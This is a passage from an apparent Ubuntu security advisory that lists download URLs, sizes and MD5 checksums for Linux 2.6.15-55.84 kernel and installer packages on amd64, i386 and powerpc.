http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    15626 94656d1862678ee9b6a3a62f90919629
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:   240372 faf0cd25cfd49759685f8a9b725e305d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:   202684 fec1b04e98e48c0e354e9a47cb00d601
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:  1048610 a5ff74bb5b40c0b6929d535abade30be
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:  1543792 217e245037c3d6c48687b594c932025b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:   161696 969b188d1e7f285fc30f39e17ebd349b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:     9834 c6278cf04b4dbb788d0eebaf599c005e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    80872 2fb47b12ddf5767a51bdc1d4e1f05e52
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    49294 f27115bb56ba683c95c915de40a46afc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    35162 4e92b8742d5ad65bf0d915d9c216c4ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    70894 c7525221ee4847b254c1839cdd4d0b31
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:     6220 8d1ee1256a6d3942c10dd7731bd34d21
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:     9062 f120989e7b729addea0a373b6c6b81a8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    57922 16f0dd4d6e989ec1684074667b9c1133
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:   123378 b2797adf33289dd9c99525971a8d001b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:   101080 0b923143d4fb260149446550b64529d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    79278 950ccff4d598e5f9c62d4ffcea1b4b66
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:  1595422 5d2e9b2d898d39363c3cab3c67391c0f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    72356 2fdf60644e4d13a5c9732d48e3b6b025
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    12648 7a5b7c88d879c5f8611add807b77dff5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    33808 f48b8b878206b3f559826c9177935c7e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:   138510 27d844c2fc790a35b13b9b68c0748ec0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    38938 c50f0d87787aacbb068bd4bfac99a953
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:   278876 09d4db859ee11c8c17a5c755a38e103c

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    18976 1d3b491a97a3cafd02b9492bbf7f320c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    43488 3592e8676adb913653d31fd7d9254ab6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:   105206 87f8b212932688293624f3c1e59c315e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:     2286 a8cbb01c110d4788b8464a3ff357a6d1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    34576 0d581950d36489a0ebc2e7aa43871105
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    97044 3e789df7024c53456caf5ce65a095c3c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    37132 fb21ce86da4297933bdd3acaeb02568a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    44126 a0e10d7f107c376bd0376cbeb7589d12
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:   167738 d6417b63d8c5511f21bc7857b1e6ef23
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    33950 d833056cd1d32851c93cc61d3780b258
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:   137978 3c251b1f57940da0f22e496ab4d9f6d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    46902 a916219f56dc797576f7cdf42535fe44
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:   133154 fdfe5b2d21ec36137e19d638cec2a39d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:   273800 05e8313fec49c11084adb52deb26878d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:   102328 ce88505cda9ff607c7bb685c60a4fb75
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:  1597794 7a8768bb650b30137362b93c9aa2e4f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-386_2.6.15-55.84_i386.deb
  Size/MD5:   857150 2de1fda09c98f8c7c0f5bb5adaf4dade
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-686_2.6.15-55.84_i386.deb
  Size/MD5:   858572 83f459c63da9ce886855913a4012edf2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-k7_2.6.15-55.84_i386.deb
  Size/MD5:   859816 5fb638b3b741914410eb7fb331dc352e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server-bigiron_2.6.15-55.84_i386.deb
  Size/MD5:   861156 732a23b93ee499deda765ee8dcd66346
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-server_2.6.15-55.84_i386.deb
  Size/MD5:   860324 57519a85aad5ad19b617c4676f28d7f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.84_i386.deb
  Size/MD5:  6918250 084d1cf58595b1cbadcbd7f16dc39756
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-386_2.6.15-55.84_i386.deb
  Size/MD5: 21724888 f5fca5f423472946432ed46a990c1ddf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-686_2.6.15-55.84_i386.deb
  Size/MD5: 22517998 6ef9d114c0f9989e9e5a0a6d4af64cd8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-k7_2.6.15-55.84_i386.deb
  Size/MD5: 22265884 1ee20e38ac15055088248b99fe684e43
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server-bigiron_2.6.15-55.84_i386.deb
  Size/MD5: 23627106 b63abff51aa83dc377d5eb9235972302
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-server_2.6.15-55.84_i386.deb
  Size/MD5: 23179652 98de15fe41e4afa4100f6105b8003f8a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    15510 9190bfcba4e54f10b48d3419f7c3d368
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:   238512 1ab04364f536a96b5c2a127765f496da
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:   197142 3f27653e150b8dba0ee8b187d8826f5e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:  1048396 03a161c4b52eb41c6d401133cd32557b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:  1741516 b42acfc4c67ddc9f0ee62bca1b54974e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:   160898 fb7d22beea89de5012d2216d0eda3a6a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:     9166 38112f1195a5bb82137e1896994656fc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    76470 c9b373c18450b29f9de3b1679249d31e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    53548 6b3491987d4f627c910d1823727dac53
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    33052 ddfeb1282d026c9b32978a5e04f1d3bb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    85628 cf78a570b17bd819e61dc92f8a12355b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:     6016 3e488082205ca42452081010da71004a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:     8760 350a58a2f466e3f592b2c7bd2e8988bf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    53636 3684ebb027993d843a17bf4c72b02b65
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:   130960 de27399a7d9abfb5f51abaeecc76ae6c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    98472 5a5a0a34b4f405bcf0936087cf616586
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    77214 fb39917bbdb208d34fe6a74f0e83d53a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:  1768884 6cb328e8edc6b0a0fd27f2a90042c30a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    69614 2d2f95e1dba3de3dd1d963fb1f953e00
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    11766 26e704eca4b49d3428687a2529990418
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    36106 522f5775e1a85646cc4d646f6eec6cc4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:   132660 97ac208287c24264bc384b1e1f253ab7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:    38574 d825ca1fbb12c5a8cd2d15b094726011
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-386-di_2.6.15-55.84_i386.udeb
  Size/MD5:   299152 345d6c44429a0a6af9d23179fb78ec8d

powerpc architecture (Apple Macintosh G3/G4/G5):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    23728 02cb39b583ee98c8d1a57ce3e5b163c9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    26006 87d2de748a7344d11fb11f8264571dd6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    49334 0847429f9dedb0f286d1c32cb3e8f467
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    51536 9ec5c9b175a6728442ddf73aa218592f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:     2306 b23053a32da0479242caeff6e2ae8b6d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:     2482 05329a184127afb2a7e48d427feafbf2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    40308 cd883cbcca861116d2518f57f47dc941
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    43844 a1c3942c443e444816749c64439275e8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   112600 098304fe251f9d8c49849946d8ac2aeb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   120740 df40f802ec2ee163a813ea0a3603aeb6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    40906 6cc3a287b3274036e57638d951480d97
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    46002 f8964625617902880cc24e8e22e03ba9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    29026 8607a334399fbe27ee424e5bc0a20103
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    29894 9e6fe015d74dd83cccedcfd8f396fbd8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   211398 ad7cb3fdf5693590d0f7056e8b9acc6b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   225188 6a00a7254a9a82981f23823145ca5a26
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    45056 c00c74d1ffa33fb6575e59067c90cfa0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    40224 ca94464b9c6eca3e9c8eeec160125e88
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:     1940 70846ff3e24ac904d034f07126d64a9d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:     2200 fa5bc162b62817d3c9f5c055d88d6016
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    80762 dead1604f5dff825e55e5299d06488dc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    86134 50f5270dc53e13c36aa423d3fb6b0af1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   111594 64c98d595b636e46123746b50eb18cd8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   125750 cad66f8b2febf24ba43c5a7db6a22312
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    53424 c668f84292a263caef7ce813b769822e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    58488 8903219e8e58a8d79564945284f00e34
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   147966 1566e7aa02add4341766fd937fc907ca
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   161910 164c7d5ef77d1693a631ce60fcc4ef8d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   318400 a6441e2cd0b1b9ecb1601516f89ff6ee
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   288040 bd11c9922fea1638ce64b776f060f81f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   115862 9eb166a9f0fb53dfd89d657cc835d10f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   116550 41e72d8893ca5a8351df20b6c7c5d2bf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:  1925168 1ad660874ee5005becbc5841bf0e9b99
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:  2449218 45d3b3e3f88b9e764c3243c2858d3730
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc-smp_2.6.15-55.84_powerpc.deb
  Size/MD5:   867470 f6031f3c87c28ee40eefa25086b71c52
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc64-smp_2.6.15-55.84_powerpc.deb
  Size/MD5:   868848 cd0781159d8768b9c92bae2d844d7b6a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc_2.6.15-55.84_powerpc.deb
  Size/MD5:   870010 f3f837cb5cd7e1fe97182ddbb7eb1a56
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.84_powerpc.deb
  Size/MD5:  6946990 d65d0ad6fdc2493e7e6c1a9d567424f1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc-smp_2.6.15-55.84_powerpc.deb
  Size/MD5: 22784626 aef1ff7ccf13cd2e2d41c80f22264eeb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc64-smp_2.6.15-55.84_powerpc.deb
  Size/MD5: 23693200 0443d7e8b68c5f89aaf7e02e666077f8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc_2.6.15-55.84_powerpc.deb
  Size/MD5: 22365476 97b5182024c5fe55fe1d45b23a39a277
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    17786 39dca7a61069a0e3c0877662e3fbb571
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    17392 b0b9f69f913131d17af3ab6d4bd6e8b2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   261374 b0b06da41991553a487982e73fe34176
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   282628 81e78bd764bb0fc65be704f3f0be4db6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   227826 39456da28b0f6baa3b74b842eba6acf0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   248944 94f3cc4cabe7f4344ea0c6ca8d6487d9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:  1048472 a6d7ef42bf3b8de677ec5fe562228e7c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:  1048600 5e01699eaac6cd159a04c724e442e321
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:  1738662 d43bf20af0979b29ad1c6df616862056
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:  1878206 711e748077e06773658c64416bfa83be
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   250824 9d2ad9e9b79a628140775760c6fb2493
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:   233538 0730a8fbc4148651919c3a74c3e1face
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    13058 11382e6f8ed79855a01a6151733d4549
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    13532 ad6adbe2c5040390d563fb6221a7a346
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    84800 0159144d3b6d69b9e319731669dea56e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    52202 9ddf5200aca5383eae56f5b7ab414c3d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    73934 43991eb97d8f163e7763dc89cef5b1aa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:    85852 20dd6d2d5ea003539e1b4f7f37bb83ba
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb
  Size/MD5:     6622 2d7cc5ebe8079dd0fae1860409cf1a8b
